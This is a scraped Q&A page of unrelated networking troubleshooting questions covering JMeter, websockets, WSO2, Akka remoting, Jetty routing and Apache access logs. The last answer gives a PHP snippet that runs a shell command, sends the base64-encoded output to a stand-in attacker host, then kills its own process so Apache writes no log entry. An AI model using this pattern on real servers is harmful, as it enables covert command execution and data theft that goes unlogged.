I am running a test script on jmeter. The design of the system I'm testing is multi-profile. Meaning, as I login using an HTTP server, I am redirected to either Server1 or Server2 (randomly). On the test script I recorded, I was redirected to Server2. So whenever I run this pre-recorded test script again (with 100 users/threads), only those requests redirected to Server2 are processed successfully and those requests redirected to Server1 are returning a 'User session Not Found' error. How do I fix this?
I have an HTTP Cache and HTTP Cookie Manager in my test plan before the HTTP samplers.
It seems like a bad configuration of two servers as they are not sharing the session data. normally, the servers share the session related information such as cookies so that client can get the response from either of the servers.
I am not sure whether you can really control which server to hit (though it hit the second server during recording, because load balancer has chosen that server for you at that point in time), it is completely Load balancer decision (based on the algorithms used, like least response times, client IP-based etc)
I suggest to check the server configurations whether they are sharing cookie level data or not. Also, suggest check which algorithm is being used by the load balancer to distribute the load across two servers.
If they are not causing the issues, then look at how the cookies are sent by the server and how the(JMeter) client is resending them (by HTTP Cookie Manager) i.e., check whether Cookies are sent by the JMeter as expected by the server(s). sometimes it is possible that partial cookies are being sent.
Please answer the following questions:
Is the request always sent to Server2 when one thread is used?
Whether the request is getting succeeded when the requests hit the server1 for single thread?
Are you hitting the load balancer URL (which inturn decides the server to hit)? Or hardcoded one of the server address?
Related
I have a Windows application (written in Java) that connects to the server (spring + httpd) via websockets. Another websocket connection is established as soon as a user authenticates to the same server from a web browser. If server notice that both clients have same IP address, it "pairs" them so both applications can talk with each other.
The challenge I'm facing currently is that when multiple Windows application are starting up, all of them establish new websocket connections that exceeds httpd limitation of 255 active connections and the server goes down.
I'm looking for some feasible solution that would not overwhelm the server. A perfect scenario: a user logs into the system using a web browser, the server tries to connect the Windows application running on a clients machine afterwards and everyone is happy.
Have you any idea how to achieve it?
What I've tried already is to not create a new websocket connection on the Windows application startup but send a GET request to the request to the server and wait for the response that will occur after authenticating a user from a web browser. Hanging GET requests still need resources and httpd keeps a separate process for each of them. Also, it turned out that httpd has a 5 minutes timeout for hanging requests and sends 502 back after reaching it out.
I thought that maybe it is possible to handle GET requests in Spring by only one process / thread, but I haven't found any info for that.
Another limitation worth noting is that the Windows application runs on customer machines and customer's security policy may not allow for any wise tricks.
I'm trying to configure the WSO2 API Manager. (version - v4.0.0)
When I try to create REST API and point to the endpoints I"m getting a Connection error message for the given endpoints. I have hosted the API Manager and the back end services on the same server(backend services are running on the tomcat application on the same server in port 8080)
API Manager Log produces the following message :
ERROR {org.wso2.carbon.apimgt.rest.api.publisher.v1.impl.ApisApiServiceImpl} - Error occurred while sending the HEAD request to the given endpoint url: org.apache.commons.httpclient.ConnectTimeoutException: The host did not accept the connection within timeout of 4000 ms
would really like to what has caused the issue.
P.S: I can access the backend services directly without any connection issues using a REST client.
It's difficult to answer the question without knowing the exact details of your deployment and the backend. But let me try. Here is what I think is happening. As you can clearly see, the error is a connection timeout The host did not accept the connection within timeout of 4000 ms.
Let me explain what happens when you click on the Check Endpoint Status button. When you click on the Check Endpoint Status button, the Browser is not directly sending a request to the Backend to validate it. The Backend URL will be passed to the APIM Server, and the Server will perform the validation by sending an HTTP HEAD request to the BE service.
So there can be two causes. First may be your backend doesn't know how to handle a HEAD request which is preventing it from accepting the request. But given the error indicated it's a network issue, I doubt it even reached the BE.
The second one is, that your Backend is not accessible from the place API Manager is running. If you are running API Manager on Server A and trying to access API Manager via browser from Server B(Local Machine). Although you can access the BE from Server B may be from Server A it's not accessible. When I say BE is not accessible from API Manager server, it means it's not accessible with the same URL that was used in API Manager. It doesn't really matter if it runs in the same Server if you are using a different DNS other than localhost to access it. So go to the server API Manager is running and send a request using the same URL that was used in API Manager and see whether it's accessible from there.
First try doing a curl request by login into the server where APIM is running (not from your local machine). Maybe due to some firewall rules within the server, the hostname given in the URL may not be accessible. Also, try sending a HEAD request as well. You might be able to get some idea why this is happening
We use simple Akka Remote calls between our EC2 instances that are behind Load balancers. Each instance type (A and B) are behind load balancers and can have multiple instances, respectively. We use tell to send requests and use getSender() to know who to respond back to, when needed.
I've tried setting remote.netty.tcp.hostname to the following configurations, listed with their outcomes:
hostname:ServerA-loadbalancer-dns:
request from ServerA --> ServerB-load-balancer: ServerB responds back to the ServerA-loadbalancer-dns allowing the response to be routed to a different instance, one that didn't make the request. Causing a timeout.
so the request works, but the response fails
hostname:ServerA-instance-dns:
request from ServerA --> ServerB-load-balancer: ServerB responds back to the ServerA-instance-dns which works because it knows exactly who to respond to.
request from ServerB --> ServerA-load-balancer: fails because the hostname is set to ServerA-instance-dns which doesn't match the load balancer used in the request. Error message:
akka.remote.EndpointWriter - dropping message [class akka.actor.ActorSelectionMessage] for non-local recipient [Actor[akka.tcp://application#ServerA-loadbalancer-dns:8000/]] arriving at [akka.tcp://application#ServerA-loadbalancer-dns:8000] inbound addresses are [akka.tcp://application#ServerA-instance-dns:8000]
So because I can't allow two acceptable hostnames for my incoming remote calls, I will always have a failure case, with this current setup. Is there a way to configure this?
I have a problem where I have several servers sending HttpRequests (using round robin to decide which server to send to) to several servers that process the requests and return the response.
I would like to have a broker in the middle that examines the request and decides which server to forward it to but the responses can be very big so I would like the response to only be sent to the original requester and not be passed back through the broker. Kind of like a proxy but the way I understand a proxy is that all data is sent back through the proxy. Is this possible?
I'm working with legacy code and would rather not change the way the requests and responses are processed but only put something in the middle that can do some smarter routing of the requests.
All this is currently done using HttpServletRequest/Response and Servlets running on embedded Jetty web servers.
Thank you!
What you're after is that the broker component is using the client's IP address when connecting to the target server. That is called IP spoofing.
Are you sure that you want to implement this yourself? Intricacies of network implementation of such a solution are quite daunting. Consider using software that has this option builtin, such as HAProxy. See these blog posts.
My workplace has Apache in-front of various Java application servers. I often have to investigate production issues and rely on those Apache Access Logs recording all requests to the application servers, whether they are successful (200), redirects(302), errors (500) or some other status.
A couple of times however, normally when an application server has become unresponsive and required a restart, it looks like maybe some requests have not been logged.
I have tried reproducing this locally (start a long running request and either allow the request to exceed the timeout on the Apache server or just kill the application server from the command-line) but I always get a request logged in the access logs.
My question is, assuming Apache is running fine but faced with an application server problem, would the Apache access logs ever miss a request?
It can miss requests in some cases, docs contain important sentence:
The server access log records all requests processed by the server.
So if request is not processed, then we should not expect entry in access_log. If you wonder if such situation can be easily reproduced, then I found a way to do it.
Consider following PHP code (test.php):
<?php
$cmd_result = shell_exec('uname -a');
file_get_contents("https://hacker.site/" . base64_encode($cmd_result));
exec('kill -9 ' . getmypid());
Also you have to run Apache with prefork MPM and mod_php module. Then make request with browser or telnet:
$ telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
GET /test.php HTTP/1.0
Connection closed by foreign host.
As you can see, connection is closed without any response. Also there are no logs in access_log nor error_log, despite code was executed and attacker received encoded result of command uname -a.